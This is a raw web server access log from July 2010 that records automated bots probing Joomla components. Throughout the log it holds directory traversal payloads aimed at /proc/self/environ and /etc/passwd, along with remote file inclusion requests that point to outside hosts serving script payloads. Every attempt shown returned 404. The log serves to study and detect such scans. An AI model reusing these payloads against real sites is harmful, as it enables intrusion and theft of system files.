188.165.213.8 - - [27/Jul/2010:13:37:21 +0200] "GET /logs/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
93.125.99.2 - - [27/Jul/2010:13:38:20 +0200] "GET /logs/error_log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 371 "-" "Mozilla/5.0"
188.165.213.8 - - [27/Jul/2010:13:39:11 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
174.121.240.147 - - [27/Jul/2010:13:39:31 +0200] "GET /logs/access_log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:39:31 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:39:31 +0200] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:40:02 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:41:44 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:43:23 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
114.108.151.149 - - [27/Jul/2010:13:44:38 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:13:45:19 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
188.165.213.8 - - [27/Jul/2010:13:45:37 +0200] "GET /logs/access_log/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:13:45:37 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:13:45:37 +0200] "GET /logs/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:00 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:00 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:09 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:09 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:21 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:21 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:21 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:21 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
67.159.44.97 - - [27/Jul/2010:13:49:33 +0200] "GET /logs/error_log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 371 "-" "Mozilla/5.0"
213.229.106.147 - - [27/Jul/2010:13:53:14 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:13:55:39 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:13:55:43 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:55:43 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:55:43 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.810"
125.141.91.138 - - [27/Jul/2010:13:56:00 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-" "libwww-perl/5.805"
189.21.153.139 - - [27/Jul/2010:13:56:04 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
114.108.151.149 - - [27/Jul/2010:13:57:55 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:14:04:44 +0200] "GET /////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:05:24 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:05:24 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:05:24 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.810"
121.78.118.123 - - [27/Jul/2010:14:05:42 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
206.251.76.114 - - [27/Jul/2010:14:06:56 +0200] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
206.251.76.114 - - [27/Jul/2010:14:06:58 +0200] "GET //index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
206.251.76.114 - - [27/Jul/2010:14:06:58 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
189.21.153.139 - - [27/Jul/2010:14:09:02 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.810"
189.21.153.139 - - [27/Jul/2010:14:09:03 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
189.21.153.139 - - [27/Jul/2010:14:09:04 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.810"
114.108.151.149 - - [27/Jul/2010:14:11:19 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:14:11:19 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:14:11:20 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:14:11:42 +0200] "GET /logs/access_log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:14:11:43 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:14:11:43 +0200] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:12:08 +0200] "GET /logs/access_log//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:12:09 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:12:09 +0200] "GET /logs//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:12:27 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:12:29 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:12:38 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
69.65.25.2 - - [27/Jul/2010:14:13:58 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:13:58 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:13:58 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:13:58 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:13:58 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:13:59 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
84.217.73.155 - - [27/Jul/2010:14:15:19 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:15:19 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
65.13.185.104 - - [27/Jul/2010:14:15:28 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:15:28 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.65.2.151 - - [27/Jul/2010:14:15:33 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:15:33 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:15:58 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:16:03 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
212.52.166.12 - - [27/Jul/2010:14:16:12 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
174.121.240.147 - - [27/Jul/2010:14:18:29 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:18:29 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:18:29 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.810"
217.65.2.151 - - [27/Jul/2010:14:18:58 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
65.13.185.104 - - [27/Jul/2010:14:19:11 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:19:13 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:19:16 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
84.217.73.155 - - [27/Jul/2010:14:19:16 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
76.70.7.48 - - [27/Jul/2010:14:19:22 +0200] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
65.13.185.104 - - [27/Jul/2010:14:19:54 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.65.2.151 - - [27/Jul/2010:14:20:11 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:20:11 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:20:12 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:20:35 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:20:35 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:20:36 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
217.65.2.151 - - [27/Jul/2010:14:21:11 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:21:11 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:21:11 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:21:33 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:21:33 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
82.79.52.157 - - [27/Jul/2010:14:21:56 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
82.79.52.157 - - [27/Jul/2010:14:21:57 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
188.165.213.8 - - [27/Jul/2010:14:22:07 +0200] "GET /logs/access_log/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:14:22:07 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:14:22:08 +0200] "GET /logs/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:22:18 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:22:18 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:22:19 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
84.217.73.155 - - [27/Jul/2010:14:23:10 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:23:10 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:23:11 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
174.121.240.147 - - [27/Jul/2010:14:24:05 +0200] "GET /logs/access_log/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:24:05 +0200] "GET /////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:24:05 +0200] "GET /logs/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
217.65.2.151 - - [27/Jul/2010:14:25:18 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 302 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:25:18 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:26:07 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:26:13 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
213.145.228.170 - - [27/Jul/2010:14:28:38 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
